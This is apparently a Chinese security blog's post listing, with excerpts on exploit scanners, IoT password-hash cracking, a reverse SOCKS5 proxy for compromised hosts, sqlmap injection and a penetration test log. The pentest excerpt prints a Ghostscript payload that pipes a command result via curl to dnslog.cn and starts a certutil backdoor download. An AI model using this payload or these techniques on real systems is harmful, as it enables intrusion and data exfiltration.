- 博客(12)
- 资源 (13)
- 收藏
- 关注
RSS订阅
原创 每个黑客爱好者都需要有自己的漏洞扫描器
先上链接:https://github.com/yuxiaokui/cloudhacker然后上代码:先是动态加载选择的exp,然后是导入攻击目标。 # 动态加载选择的漏洞利用代码 exp = importlib.import_module('exp.' + host[int(target)-1] + '.' + pocs[int(flag) - 1][:-3]) # 选择通过zoomeye还是shodan还是文件来导入目标 api_select = inpu
2020-06-01 13:37:24
409
原创 IOT漏洞挖掘入门
一日无聊,发现一篇文章https://www.52pojie.cn/thread-367479-1-1.html看评论是乌云 14年8月提交的漏洞。于是进一步分析一下。首先拿到http://地址/.htpasswdadmin:$1$$xAjuh7utDUp3xXVqThWzp/在hashcat中进行破解Session..........: hashcatStatus...........: RunningHash.Type........: md5crypt, .
2020-06-01 10:57:15
1064
原创 Yolov5+DeepSort 统计数量
GitHub - mikel-brostrom/Yolov5_DeepSort_Pytorch: Real-time multi-object tracker using YOLO v5 and deep sorthttps://github.com/mikel-brostrom/Yolov5_DeepSort_Pytorch1、安装python3.81 apt-get install python3.8-distutils -y 2 apt-get install python3.
2022-02-15 09:31:26
1592
2
原创 反向socks5代理工具
github.com/yuxiaokui/gohtran闲来无事,用golang写了个反向socks5代理工具.方便搞渗透的同学们使用.首先在公网VPS上执行listener 3389 333333389端口是用来监听肉鸡上线的,后面的33333端口是开放的socks5服务端口.然后在内网的肉鸡中执行client vps_ip:3389webshell也可以玩哦.OK,配上socks5代理,尽情内网漫游吧.本工具完全开源,大家随意修改....
2020-09-08 15:07:43
826
转载 【转载】sqlmap-tamper使用介绍
SQLMAP当前为1.2.7.20,共有57个tamper脚本,与1.0版本相比新增了19个脚本。序号脚本名称注释10x2char将每个编码后的字符转换为等价表达2apostrophemask单引号替换为Utf8字符3apostrophenullencode替换双引号为%00%274appendnullbyte有效代码后添加%005base64encode使用base64编码6between比较符替换为between7bl
2020-06-11 10:35:02
383
原创 白嫖Google Colab进行GPU解密
一.Colab简介https://colab.research.google.com/notebooks/welcome.ipynb偶然间接触到Colab,发现它居然支持GPU,而且是免费使用。官方介绍:Colaboratory 是一个免费的 Jupyter 笔记本环境,不需要进行任何设置就可以使用,并且完全在云端运行。借助 Colaboratory,可以编写和执行代码、保存和共享分析结果,以及利用强大的计算资源,所有这些都可通过浏览器免费使用。二.破解密码首先需要安装HASHCATpri
2020-06-11 10:32:44
3173
1
原创 记录一次常规的渗透测试
首先是魔图漏洞%!PSuserdict /setpagedevice undefsavelegal{ null restore } stopped { pop } if{ legal } stopped { pop } ifrestoremark /OutputFile (%pipe%curl http://dnslog.cn/`whomai`) currentdevice putdeviceprops然后windows下载后门。方法1:certutil.exe -urlca
2020-06-01 10:32:08
443
原创 Flink实时流计算中,如何融入tensorflow
from keras.models import Sequential, load_modelimport numpymodel = load_model('xxx.h5')model.compile(loss = 'binary_crossentropy', optimizer = 'adam', metrics = ['accuracy'])model._make_pred...
2019-01-10 17:38:25
3896
2
原创 作为渗透测试工程师有什么有趣的经历
0x01之前给移动做渗透测试。后半夜用拿到的移动短信接口,给移动跟我们对接的客户领导发短信:哥,昨晚的小姐还满意不?【前提是你们跟客户的关系处到可以随便开玩笑的地步。否则可能被轰出去。】哈哈哈,这个梗,我能笑十年。 0x02目标久攻不下,给等保组一个脚本,拿去目标机器抓密码。结果被360杀出来了。客户很生气。哈哈哈哈,一逗比同事干的,赤果果的坑队友。 0x0...
2018-11-06 17:43:28
8179
原创 需要输入验证码的登录框使用SQLMAP进行注入攻击
多时候,在测试登录框注入的时候,会遇到有验证码。这里考虑验证码单次输入不失效的场景。 首先,配置好burpsuite和chrome,输入admin' 密码随意,正确的验证码。 把request请求copy to file.然后不要关闭浏览器与burpsuite。 打开SQLMAP进行注入. SQLMAP -r raw.log --proxy="http://127.0....
2018-11-06 17:41:51
5159
原创 白帽子们是如何看待挖洞的?
为挖洞而生!我挖洞我快乐——开拓者挖洞就是因为爱啊——FYX我是白帽子,用黑客的技术能力发现问题,用正确的价值观解决问题。不为利益所动摇,不为黑产而弯腰,不管世界怎么办,安全第一的初心永不变!请相信你的指尖有改变世界的力量!——Dream catcher为什么挖洞?为了生活。——Henry如果不是为了正义,那么挖洞将毫无意义——Rotten apple挖洞的过程学习姿势,顺便赚...
2018-11-06 17:41:15
828
1
原创 pymongo使用socks5代理
from pymongo import MongoClientimport socketimport sockssocks.set_default_proxy(socks.SOCKS5, "localhost", 8899)socket.socket = socks.socksocketdata = MongoClient('172.18.0.2').db.web.find({})
2018-07-09 13:51:05
936
ysoserial.jar
2020-06-01
超级注入工具,支持C段注入Super Injection
2011-11-30
PHP手工注入经典教程
2010-12-12
linux下的LCX端口转发工具
2010-12-12
双开XP3389的termsrvhack.dll
2010-09-04
本人自己写的一个关于win7的简单的asp+access网站,包括新闻留言等
2010-06-12
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人